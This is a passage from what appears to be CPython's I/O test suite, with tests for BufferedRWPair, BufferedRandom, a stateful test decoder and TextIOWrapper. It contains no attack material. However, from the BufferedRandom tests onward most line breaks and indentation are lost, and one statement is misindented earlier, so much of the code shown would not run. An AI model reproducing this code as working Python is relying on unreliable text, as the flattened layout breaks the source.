    for method in ("readinto", "readinto1"):
        with self.subTest(method):
            pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
            # byteslike is a buffer-protocol wrapper defined elsewhere in
            # this test file; exercises non-bytearray targets.
            data = byteslike(b'\0' * 5)
            self.assertEqual(getattr(pair, method)(data), 5)
            self.assertEqual(bytes(data), b"abcde")

def test_write(self):
    """Writes go to the writer side only, and the data is copied at
    write() time (later mutation of the caller's buffer must not leak
    into what gets flushed)."""
    w = self.MockRawIO()
    pair = self.tp(self.MockRawIO(), w)
    pair.write(b"abc")
    pair.flush()
    buffer = bytearray(b"def")
    pair.write(buffer)
    buffer[:] = b"***" # Overwrite our copy of the data
    pair.flush()
    self.assertEqual(w._write_stack, [b"abc", b"def"])

def test_peek(self):
    """peek() shows upcoming bytes without consuming them."""
    pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
    self.assertTrue(pair.peek(3).startswith(b"abc"))
    # The peeked bytes are still returned by the following read().
    self.assertEqual(pair.read(3), b"abc")

def test_readable(self):
    pair = self.tp(self.MockRawIO(), self.MockRawIO())
    self.assertTrue(pair.readable())

def test_writeable(self):
    pair = self.tp(self.MockRawIO(), self.MockRawIO())
    self.assertTrue(pair.writable())

def test_seekable(self):
    # BufferedRWPairs are never seekable, even if their readers and writers
    # are.
    pair = self.tp(self.MockRawIO(), self.MockRawIO())
    self.assertFalse(pair.seekable())

# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
    """Closing the pair marks the pair object itself as closed."""
    pair = self.tp(self.MockRawIO(), self.MockRawIO())
    self.assertFalse(pair.closed)
    pair.close()
    self.assertTrue(pair.closed)

def test_reader_close_error_on_close(self):
    """If the reader's close() raises, the error propagates, the pair is
    still marked closed, and the writer side still gets closed."""
    def reader_close():
        reader_non_existing  # unbound name -> NameError on purpose
    reader = self.MockRawIO()
    reader.close = reader_close
    writer = self.MockRawIO()
    pair = self.tp(reader, writer)
    with self.assertRaises(NameError) as err:
        pair.close()
    self.assertIn('reader_non_existing', str(err.exception))
    self.assertTrue(pair.closed)
    self.assertFalse(reader.closed)
    self.assertTrue(writer.closed)
    # Silence destructor error
    reader.close = lambda: None

def test_writer_close_error_on_close(self):
    """If the writer's close() raises, the error propagates, the pair is
    NOT marked closed, and the reader side has already been closed."""
    def writer_close():
        writer_non_existing  # unbound name -> NameError on purpose
    reader = self.MockRawIO()
    writer = self.MockRawIO()
    writer.close = writer_close
    pair = self.tp(reader, writer)
    with self.assertRaises(NameError) as err:
        pair.close()
    self.assertIn('writer_non_existing', str(err.exception))
    self.assertFalse(pair.closed)
    self.assertTrue(reader.closed)
    self.assertFalse(writer.closed)
    # Silence destructor error
    writer.close = lambda: None
    writer = None

    # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
    with support.catch_unraisable_exception():
        # Ignore BufferedRWPair unraisable exception
        with support.catch_unraisable_exception():
            pair = None
            support.gc_collect()
        support.gc_collect()

def test_reader_writer_close_error_on_close(self):
    """When both close() calls raise, the reader's error is the one
    raised, with the writer's error chained as __context__."""
    def reader_close():
        reader_non_existing
    def writer_close():
        writer_non_existing
    reader = self.MockRawIO()
    reader.close = reader_close
    writer = self.MockRawIO()
    writer.close = writer_close
    pair = self.tp(reader, writer)
    with self.assertRaises(NameError) as err:
        pair.close()
    self.assertIn('reader_non_existing', str(err.exception))
    self.assertIsInstance(err.exception.__context__, NameError)
    self.assertIn('writer_non_existing', str(err.exception.__context__))
    self.assertFalse(pair.closed)
    self.assertFalse(reader.closed)
    self.assertFalse(writer.closed)
    # Silence destructor error
    reader.close = lambda: None
writer.close = lambda: None

def test_isatty(self):
    """The pair reports a tty if EITHER underlying stream is a tty."""
    class SelectableIsAtty(MockRawIO):
        # Mock whose isatty() answer is fixed at construction time.
        def __init__(self, isatty):
            MockRawIO.__init__(self)
            self._isatty = isatty
        def isatty(self):
            return self._isatty
    pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
    self.assertFalse(pair.isatty())
    pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
    self.assertTrue(pair.isatty())
    pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
    self.assertTrue(pair.isatty())
    pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
    self.assertTrue(pair.isatty())

def test_weakref_clearing(self):
    """Dropping the pair and its weakref must not crash the interpreter."""
    brw = self.tp(self.MockRawIO(), self.MockRawIO())
    ref = weakref.ref(brw)
    brw = None
    ref = None # Shouldn't segfault.

class CBufferedRWPairTest(BufferedRWPairTest):
    # Run the shared BufferedRWPair tests against the C implementation.
    tp = io.BufferedRWPair

class PyBufferedRWPairTest(BufferedRWPairTest):
    # Run the shared BufferedRWPair tests against the pure-Python version.
    tp = pyio.BufferedRWPair

class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
    """Shared tests for BufferedRandom: inherits both the reader and the
    writer suites and adds mixed read/write/seek scenarios."""
    read_mode = "rb+"
    write_mode = "wb+"

    def test_constructor(self):
        # Exercise both inherited constructor checks.
        BufferedReaderTest.test_constructor(self)
        BufferedWriterTest.test_constructor(self)

    def test_uninitialized(self):
        BufferedReaderTest.test_uninitialized(self)
        BufferedWriterTest.test_uninitialized(self)

    def test_read_and_write(self):
        raw = self.MockRawIO((b"asdf", b"ghjk"))
        rw = self.tp(raw, 8)
        self.assertEqual(b"as", rw.read(2))
        rw.write(b"ddd")
        rw.write(b"eee")
        self.assertFalse(raw._write_stack) # Buffer writes
        self.assertEqual(b"ghjk", rw.read())
        # Both writes were coalesced into a single raw write on flush.
        self.assertEqual(b"dddeee", raw._write_stack[0])

    def test_seek_and_tell(self):
        raw = self.BytesIO(b"asdfghjkl")
        rw = self.tp(raw)
        self.assertEqual(b"as", rw.read(2))
        self.assertEqual(2, rw.tell())
        rw.seek(0, 0)
        self.assertEqual(b"asdf", rw.read(4))
        rw.write(b"123f")
        rw.seek(0, 0)
        self.assertEqual(b"asdf123fl", rw.read())
        self.assertEqual(9, rw.tell())
        # whence=2: relative to end of stream.
        rw.seek(-4, 2)
        self.assertEqual(5, rw.tell())
        # whence=1: relative to current position.
        rw.seek(2, 1)
        self.assertEqual(7, rw.tell())
        self.assertEqual(b"fl", rw.read(11))
        rw.flush()
        self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0) def check_flush_and_read(self, read_func): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) self.assertEqual(b"ab", read_func(bufio, 2)) bufio.write(b"12") self.assertEqual(b"ef", read_func(bufio, 2)) self.assertEqual(6, bufio.tell()) bufio.flush() self.assertEqual(6, bufio.tell()) self.assertEqual(b"ghi", read_func(bufio)) raw.seek(0, 0) raw.write(b"XYZ") # flush() resets the read buffer bufio.flush() bufio.seek(0, 0) self.assertEqual(b"XYZ", read_func(bufio, 3)) def test_flush_and_read(self): self.check_flush_and_read(lambda bufio, *args: bufio.read(*args)) def test_flush_and_readinto(self): def _readinto(bufio, n=-1): b = bytearray(n if n >= 0 else 9999) n = bufio.readinto(b) return bytes(b[:n]) self.check_flush_and_read(_readinto) def test_flush_and_peek(self): def _peek(bufio, n=-1): # This relies on the fact that the buffer can contain the whole # raw stream, otherwise peek() can return less. b = bufio.peek(n) if n != -1: b = b[:n] bufio.seek(len(b), 1) return b self.check_flush_and_read(_peek) def test_flush_and_write(self): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) bufio.write(b"123") bufio.flush() bufio.write(b"45") bufio.flush() bufio.seek(0, 0) self.assertEqual(b"12345fghi", raw.getvalue()) self.assertEqual(b"12345fghi", bufio.read()) def test_threads(self): BufferedReaderTest.test_threads(self) BufferedWriterTest.test_threads(self) def test_writes_and_peek(self): def _peek(bufio): bufio.peek(1) self.check_writes(_peek) def _peek(bufio): pos = bufio.tell() bufio.seek(-1, 1) bufio.peek(1) bufio.seek(pos, 0) self.check_writes(_peek) def test_writes_and_reads(self): def _read(bufio): bufio.seek(-1, 1) bufio.read(1) self.check_writes(_read) def test_writes_and_read1s(self): def _read1(bufio): bufio.seek(-1, 1) bufio.read1(1) self.check_writes(_read1) def test_writes_and_readintos(self): def _read(bufio): bufio.seek(-1, 1) bufio.readinto(bytearray(1)) self.check_writes(_read) def 
test_write_after_readahead(self): # Issue #6629: writing after the buffer was filled by readahead should # first rewind the raw stream. for overwrite_size in [1, 5]: raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 4) # Trigger readahead self.assertEqual(bufio.read(1), b"A") self.assertEqual(bufio.tell(), 1) # Overwriting should rewind the raw stream if it needs so bufio.write(b"B" * overwrite_size) self.assertEqual(bufio.tell(), overwrite_size + 1) # If the write size was smaller than the buffer size, flush() and # check that rewind happens. bufio.flush() self.assertEqual(bufio.tell(), overwrite_size + 1) s = raw.getvalue() self.assertEqual(s, b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size)) def test_write_rewind_write(self): # Various combinations of reading / writing / seeking backwards / writing again def mutate(bufio, pos1, pos2): assert pos2 >= pos1 # Fill the buffer bufio.seek(pos1) bufio.read(pos2 - pos1) bufio.write(b'\x02') # This writes earlier than the previous write, but still inside # the buffer. 
bufio.seek(pos1) bufio.write(b'\x01') b = b"\x80\x81\x82\x83\x84" for i in range(0, len(b)): for j in range(i, len(b)): raw = self.BytesIO(b) bufio = self.tp(raw, 100) mutate(bufio, i, j) bufio.flush() expected = bytearray(b) expected[j] = 2 expected[i] = 1 self.assertEqual(raw.getvalue(), expected, "failed result for i=%d, j=%d" % (i, j)) def test_truncate_after_read_or_write(self): raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 100) self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled self.assertEqual(bufio.truncate(), 2) self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases self.assertEqual(bufio.truncate(), 4) def test_misbehaved_io(self): BufferedReaderTest.test_misbehaved_io(self) BufferedWriterTest.test_misbehaved_io(self) def test_interleaved_read_write(self): # Test for issue #12213 with self.BytesIO(b'abcdefgh') as raw: with self.tp(raw, 100) as f: f.write(b"1") self.assertEqual(f.read(1), b'b') f.write(b'2') self.assertEqual(f.read1(1), b'd') f.write(b'3') buf = bytearray(1) f.readinto(buf) self.assertEqual(buf, b'f') f.write(b'4') self.assertEqual(f.peek(1), b'h') f.flush() self.assertEqual(raw.getvalue(), b'1b2d3f4h') with self.BytesIO(b'abc') as raw: with self.tp(raw, 100) as f: self.assertEqual(f.read(1), b'a') f.write(b"2") self.assertEqual(f.read(1), b'c') f.flush() self.assertEqual(raw.getvalue(), b'a2c') def test_interleaved_readline_write(self): with self.BytesIO(b'ab\ncdef\ng\n') as raw: with self.tp(raw) as f: f.write(b'1') self.assertEqual(f.readline(), b'b\n') f.write(b'2') self.assertEqual(f.readline(), b'def\n') f.write(b'3') self.assertEqual(f.readline(), b'\n') f.flush() self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n') # You can't construct a BufferedRandom over a non-seekable stream. test_unseekable = None # writable() returns True, so there's no point to test it over # a writable stream. 
test_truncate_on_read_only = None  # disable inherited read-only test; stream is writable here

class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
    # Run the shared BufferedRandom tests against the C implementation.
    tp = io.BufferedRandom

    @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
                     "instead of returning NULL for malloc failure.")
    def test_constructor(self):
        """Constructor checks plus an oversized-buffer allocation probe."""
        BufferedRandomTest.test_constructor(self)
        # The allocation can succeed on 32-bit builds, e.g. with more
        # than 2 GiB RAM and a 64-bit kernel.
        if sys.maxsize > 0x7FFFFFFF:
            rawio = self.MockRawIO()
            bufio = self.tp(rawio)
            self.assertRaises((OverflowError, MemoryError, ValueError),
                              bufio.__init__, rawio, sys.maxsize)

    def test_garbage_collection(self):
        # Reuse the reader- and writer-specific GC checks.
        CBufferedReaderTest.test_garbage_collection(self)
        CBufferedWriterTest.test_garbage_collection(self)

    def test_args_error(self):
        # Issue #17275
        with self.assertRaisesRegex(TypeError, "BufferedRandom"):
            self.tp(io.BytesIO(), 1024, 1024, 1024)

class PyBufferedRandomTest(BufferedRandomTest):
    # Run the shared BufferedRandom tests against the pure-Python version.
    tp = pyio.BufferedRandom

# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
#   undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
#   last input byte is received.
# - The number of output characters can vary depending on previous input.

class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
    """
    For testing seek/tell behavior with a stateful, buffering decoder.

    Input is a sequence of words. Words may be fixed-length (length set
    by input) or variable-length (period-terminated). In variable-length
    mode, extra periods are ignored. Possible words are:
      - 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99). - Any other word is converted into a word followed by a period on the output. The output word consists of the input word truncated or padded out with hyphens to make its length equal to O. If O is 0, the word is output verbatim without truncating or padding. I and O are initially set to 1. When I changes, any buffered input is re-scanned according to the new I. EOF also terminates the last word. """ def __init__(self, errors='strict'): codecs.IncrementalDecoder.__init__(self, errors) self.reset() def __repr__(self): return '<SID %x>' % id(self) def reset(self): self.i = 1 self.o = 1 self.buffer = bytearray() def getstate(self): i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset() return bytes(self.buffer), i*100 + o def setstate(self, state): buffer, io = state self.buffer = bytearray(buffer) i, o = divmod(io, 100) self.i, self.o = i ^ 1, o ^ 1 def decode(self, input, final=False): output = '' for b in input: if self.i == 0: # variable-length, terminated with period if b == ord('.'): if self.buffer: output += self.process_word() else: self.buffer.append(b) else: # fixed-length, terminate after self.i bytes self.buffer.append(b) if len(self.buffer) == self.i: output += self.process_word() if final and self.buffer: # EOF terminates the last word output += self.process_word() return output def process_word(self): output = '' if self.buffer[0] == ord('i'): self.i = min(99, int(self.buffer[1:] or 0)) # set input length elif self.buffer[0] == ord('o'): self.o = min(99, int(self.buffer[1:] or 0)) # set output length else: output = self.buffer.decode('ascii') if len(output) < self.o: output += '-'*self.o # pad out with hyphens if self.o: output = output[:self.o] # truncate to output length output += '.' 
self.buffer = bytearray() return output codecEnabled = False # bpo-41919: This method is separated from StatefulIncrementalDecoder to avoid a resource leak # when registering codecs and cleanup functions. def lookupTestDecoder(name): if StatefulIncrementalDecoder.codecEnabled and name == 'test_decoder': latin1 = codecs.lookup('latin-1') return codecs.CodecInfo( name='test_decoder', encode=latin1.encode, decode=None, incrementalencoder=None, streamreader=None, streamwriter=None, incrementaldecoder=StatefulIncrementalDecoder) class StatefulIncrementalDecoderTest(unittest.TestCase): """ Make sure the StatefulIncrementalDecoder actually works. """ test_cases = [ # I=1, O=1 (fixed-length input == fixed-length output) (b'abcd', False, 'a.b.c.d.'), # I=0, O=0 (variable-length input, variable-length output) (b'oiabcd', True, 'abcd.'), # I=0, O=0 (should ignore extra periods) (b'oi...abcd...', True, 'abcd.'), # I=0, O=6 (variable-length input, fixed-length output) (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'), # I=2, O=6 (fixed-length input < fixed-length output) (b'i.i2.o6xyz', True, 'xy----.z-----.'), # I=6, O=3 (fixed-length input > fixed-length output) (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'), # I=0, then 3; O=29, then 15 (with longer output) (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True, 'a----------------------------.' + 'b----------------------------.' + 'cde--------------------------.' + 'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' + 'd.e------------.' + 'k--------------.' + 'l--------------.' + 'm--------------.') ] def test_decoder(self): # Try a few one-shot test cases. for input, eof, output in self.test_cases: d = StatefulIncrementalDecoder() self.assertEqual(d.decode(input, eof), output) # Also test an unfinished decode, followed by forcing EOF. 
d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") os_helper.unlink(os_helper.TESTFN) codecs.register(lookupTestDecoder) self.addCleanup(codecs.unregister, lookupTestDecoder) def tearDown(self): os_helper.unlink(os_helper.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # 
Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, "ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = "dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), 
b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b 
= self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. 
for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): 
l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(os_helper.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(os_helper.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def 
multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(os_helper.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(os_helper.TESTFN, "wb") as f: f.write(line*2) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(os_helper.TESTFN, "wb") as f: f.write(data) with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. 
